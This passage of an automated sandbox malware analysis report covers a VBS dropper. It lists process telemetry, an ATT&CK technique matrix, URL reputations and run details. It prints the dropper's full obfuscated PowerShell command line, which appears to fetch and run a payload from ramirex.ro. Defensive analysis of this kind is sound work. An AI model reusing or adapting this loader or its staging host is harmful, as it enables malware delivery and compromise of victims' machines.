        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4921Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4942Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5580Thread sleep time: -4611686018427385s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000002.00000002.2237631693.0000023E75FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Yara matchFile source: amsi64_2664.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2664, type: MEMORYSTR
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldigt){$Doors=$Gyldigt.Length-$Sensualistiske;For($Papirtigerne=5;$Papirtigerne -lt $Doors;$Papirtigerne+=6){$Reoxygenize+=$Gyldigt.$Megampere.Invoke( $Papirtigerne, $Sensualistiske);}$Reoxygenize;}function Hadaway($Awiggle){ & ($Feeblenesses) ($Awiggle);}$Allitterationernes=Skdefrakker ' InveMUnstaozithazFort.i .ontlAcro.lWo riaOffen/,odel5Snf,e. Svir0Apag. Medle(F aktWAlureiAngwin Salpd fortoAkti wFo,eosDeval ,latfNgrozaT Midt Teleg1Sa.pe0Di,se.bedir0Franc; Toxi Non.WSlur iDerkrnmaner6Qui.q4 Tids; Spaa DiffxAde,o6Non.q4Bedri;fogus Skivr,lommvSlagl:incom1Sti l2 Cy,t1Pundu.Paran0Still),asto LadeGSangueunp,rc ,ithkRoop oPreco/,enom2Besva0Covis1 Inno0Pudsi0Harpe1 B.mp0In,an1Chait GotthFPrikkiSlfanrDrapfeHy,stfPeakioB.gcaxNoi.e/Sanit1Van b2furil1Klept.Augus0Cente ';$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k ';$Gualaca=Skdefrakker 'SowabhSubtotFedtetAnsatpElizas Forr: uci/Fakul/ ChrorE.togaRecormBenzoiBlundrMozegeCentaxKo le.Grun r LogfoFo,dl/Sli euSchatn,nterp AerorRespoiFnugln MinicLogiciUnderpAquarl.iiiseT.ividR.gti.SketcsVir.eeTr usapaala ';$sacrum=Skdefrakker 'Llers>Frugt ';$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';$Lophiostomous='Westfilms';$Opkrsler250 = Skdefrakker ' Lo he TralcUdholh JagtoFreda Brune%Se.weaBrne,pD.iftpChokpdV.lutaOptrktStendaSangu%Slumm\ or dDStandsAbette ,nken S lgerorsc.AramiKopponnU,dereHarmo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue cJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dsene.Kne && echo t"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$megampere='sub';$megampere+='strin';$sensualistiske = 1;$megampere+='g';function skdefrakker($gyldigt){$doors=$gyldigt.length-$sensualistiske;for($papirtigerne=5;$papirtigerne -lt $doors;$papirtigerne+=6){$reoxygenize+=$gyldigt.$megampere.invoke( $papirtigerne, $sensualistiske);}$reoxygenize;}function hadaway($awiggle){ & ($feeblenesses) ($awiggle);}$allitterationernes=skdefrakker ' invemunstaozithazfort.i .ontlacro.lwo riaoffen/,odel5snf,e. svir0apag. medle(f aktwalureiangwin salpd fortoakti wfo,eosdeval ,latfngrozat midt teleg1sa.pe0di,se.bedir0franc; toxi non.wslur iderkrnmaner6qui.q4 tids; spaa diffxade,o6non.q4bedri;fogus skivr,lommvslagl:incom1sti l2 cy,t1pundu.paran0still),asto ladegsangueunp,rc ,ithkroop opreco/,enom2besva0covis1 inno0pudsi0harpe1 b.mp0in,an1chait gotthfprikkislfanrdrapfehy,stfpeakiob.gcaxnoi.e/sanit1van b2furil1klept.augus0cente ';$unresponsible=skdefrakker 'i.ddaugrappselbapehovedrinten-adskia rel.gagerbeuns,rnfluort in,k ';$gualaca=skdefrakker 'sowabhsubtotfedtetansatpelizas forr: uci/fakul/ chrore.togarecormbenzoiblundrmozegecentaxko le.grun r logfofo,dl/sli euschatn,nterp aerorrespoifnugln miniclogiciunderpaquarl.iiiset.ividr.gti.sketcsvir.eetr usapaala ';$sacrum=skdefrakker 'llers>frugt ';$feeblenesses=skdefrakker 'bulimiremaie vi.txbryll ';$lophiostomous='westfilms';$opkrsler250 = skdefrakker ' lo he tralcudholh jagtofreda brune%se.weabrne,pd.iftpchokpdv.lutaoptrktstendasangu%slumm\ or ddstandsabette ,nken s lgerorsc.aramikopponnu,dereharmo in,on& a zo&ko ku va,deoverpcunde.hsco,ooskopu deputfeday ';hadaway (skdefrakker ' fors$v lgrgrkeb lsherrostophboverfabisexllustr:mumb.reksemaharemdstilbiovereootosaa dublctoneatmac.si out.vsamboepiloc=prism(dishwcloo emchiqudblake ant,t/.gnencsdigh faste$ gemsostatsp ugebkdublirpreens paralexcesedimenrinco.2ind.a5klas,0t,ana)m,rkw ');hadaway (skdefrakker 'exfig$ afmag estolrekogopropubplopsaorloglbange:.eglvddoorkecel irgourmvma,kei gasospolith anthl at minonphkrenulerekto= sl.m$corslg lillu sterat.ykplagraraadrescbartea tran.wo ris.ontop grealax.nei par.tstjfl( peri$mutins al,uastalic ,ytire.traubreakmconci)unmov ');$gualaca=$dervishlike[0];$mayaca= (skdefrakker 'com,r$ intrgo.erlltra hosdva b,kohoau,dullsortk: kon.w iba.a no puadvanbgeroden.areetilbunhexac2s.der0tima 5dan e=puttinforgje intew sm d-h.smao junkbtorpej homoef rticmisceteurok h,roispantiynabonsantebtwakasegrif,mheste.obtrunop,ege scrutangri.r.chrwfr kee bldsbrearrcnondelselekibolige,radan cognt');$mayaca+=$radioactive[1];hadaway ($mayaca);hadaway (skdefrakker 'nytte$opka wele,eastblouudtr,b klone cla,eproctngasbo2tilhy0echin5neuro.gli,shsup re uninaboligdfremfemisjorfingesdater[bankv$hi,liu snounleggiracrotegr,ndsfond.p,rodeohovedncrosssmichei gobebshuddlwodelemaa e]guill=vanfu$pennea ki slante linterifictit uri,tpred.e drkir,oamba outwthauboivehemoarmo n ge be semir moden wofue c
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$megampere='sub';$megampere+='strin';$sensualistiske = 1;$megampere+='g';function skdefrakker($gyldigt){$doors=$gyldigt.length-$sensualistiske;for($papirtigerne=5;$papirtigerne -lt $doors;$papirtigerne+=6){$reoxygenize+=$gyldigt.$megampere.invoke( $papirtigerne, $sensualistiske);}$reoxygenize;}function hadaway($awiggle){ & ($feeblenesses) ($awiggle);}$allitterationernes=skdefrakker ' invemunstaozithazfort.i .ontlacro.lwo riaoffen/,odel5snf,e. svir0apag. medle(f aktwalureiangwin salpd fortoakti wfo,eosdeval ,latfngrozat midt teleg1sa.pe0di,se.bedir0franc; toxi non.wslur iderkrnmaner6qui.q4 tids; spaa diffxade,o6non.q4bedri;fogus skivr,lommvslagl:incom1sti l2 cy,t1pundu.paran0still),asto ladegsangueunp,rc ,ithkroop opreco/,enom2besva0covis1 inno0pudsi0harpe1 b.mp0in,an1chait gotthfprikkislfanrdrapfehy,stfpeakiob.gcaxnoi.e/sanit1van b2furil1klept.augus0cente ';$unresponsible=skdefrakker 'i.ddaugrappselbapehovedrinten-adskia rel.gagerbeuns,rnfluort in,k ';$gualaca=skdefrakker 'sowabhsubtotfedtetansatpelizas forr: uci/fakul/ chrore.togarecormbenzoiblundrmozegecentaxko le.grun r logfofo,dl/sli euschatn,nterp aerorrespoifnugln miniclogiciunderpaquarl.iiiset.ividr.gti.sketcsvir.eetr usapaala ';$sacrum=skdefrakker 'llers>frugt ';$feeblenesses=skdefrakker 'bulimiremaie vi.txbryll ';$lophiostomous='westfilms';$opkrsler250 = skdefrakker ' lo he tralcudholh jagtofreda brune%se.weabrne,pd.iftpchokpdv.lutaoptrktstendasangu%slumm\ or ddstandsabette ,nken s lgerorsc.aramikopponnu,dereharmo in,on& a zo&ko ku va,deoverpcunde.hsco,ooskopu deputfeday ';hadaway (skdefrakker ' fors$v lgrgrkeb lsherrostophboverfabisexllustr:mumb.reksemaharemdstilbiovereootosaa dublctoneatmac.si out.vsamboepiloc=prism(dishwcloo emchiqudblake ant,t/.gnencsdigh faste$ gemsostatsp ugebkdublirpreens paralexcesedimenrinco.2ind.a5klas,0t,ana)m,rkw ');hadaway (skdefrakker 'exfig$ afmag estolrekogopropubplopsaorloglbange:.eglvddoorkecel irgourmvma,kei gasospolith anthl at minonphkrenulerekto= sl.m$corslg lillu sterat.ykplagraraadrescbartea tran.wo ris.ontop grealax.nei par.tstjfl( peri$mutins al,uastalic ,ytire.traubreakmconci)unmov ');$gualaca=$dervishlike[0];$mayaca= (skdefrakker 'com,r$ intrgo.erlltra hosdva b,kohoau,dullsortk: kon.w iba.a no puadvanbgeroden.areetilbunhexac2s.der0tima 5dan e=puttinforgje intew sm d-h.smao junkbtorpej homoef rticmisceteurok h,roispantiynabonsantebtwakasegrif,mheste.obtrunop,ege scrutangri.r.chrwfr kee bldsbrearrcnondelselekibolige,radan cognt');$mayaca+=$radioactive[1];hadaway ($mayaca);hadaway (skdefrakker 'nytte$opka wele,eastblouudtr,b klone cla,eproctngasbo2tilhy0echin5neuro.gli,shsup re uninaboligdfremfemisjorfingesdater[bankv$hi,liu snounleggiracrotegr,ndsfond.p,rodeohovedncrosssmichei gobebshuddlwodelemaa e]guill=vanfu$pennea ki slante linterifictit uri,tpred.e drkir,oamba outwthauboivehemoarmo n ge be semir moden wofue cJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information221
        Scripting
        Valid Accounts11
        Command and Scripting Interpreter
        221
        Scripting
        11
        Process Injection
        1
        Masquerading
        OS Credential Dumping1
        Security Software Discovery
        Remote Services1
        Archive Collected Data
        11
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        21
        Virtualization/Sandbox Evasion
        LSASS Memory1
        Process Discovery
        Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        PowerShell
        Logon Script (Windows)Logon Script (Windows)11
        Process Injection
        Security Account Manager21
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
        Obfuscated Files or Information
        NTDS1
        Application Window Discovery
        Distributed Component Object ModelInput Capture13
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Software Packing
        LSA Secrets1
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials12
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        IMG-35235235523525235252532535Selvfinansieret.vbs3%ReversingLabs
        IMG-35235235523525235252532535Selvfinansieret.vbs6%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://crl.m0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
        http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
        https://go.micro0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        https://aka.ms/pscore680%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        https://ramirex.ro/unprincipled.seaP0%Avira URL Cloudsafe
        http://ramirex.ro0%Avira URL Cloudsafe
        https://ramirex.ro/unprincipled.sea0%Avira URL Cloudsafe
        https://ramirex.ro0%Avira URL Cloudsafe
        https://github.com/Pester/Pester0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        ramirex.ro
        188.215.50.15
        truefalse
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://ramirex.ro/unprincipled.seafalse
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://ramirex.ro/unprincipled.seaPpowershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://crl.mpowershell.exe, 00000002.00000002.2237631693.0000023E75FEE000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmptrue
          • URL Reputation: malware
          unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://go.micropowershell.exe, 00000002.00000002.2185875177.0000023E01373000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://contoso.com/powershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://contoso.com/Licensepowershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://contoso.com/Iconpowershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          https://aka.ms/pscore68powershell.exe, 00000002.00000002.2185875177.0000023E00001000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2185875177.0000023E00001000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          unknown
          http://ramirex.ropowershell.exe, 00000002.00000002.2185875177.0000023E01DAF000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://ramirex.ropowershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2185875177.0000023E018BC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          188.215.50.15
          ramirex.roRomania
          34358WEBCLASSITROfalse
          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1448280
          Start date and time:2024-05-28 08:08:09 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 24s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:8
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
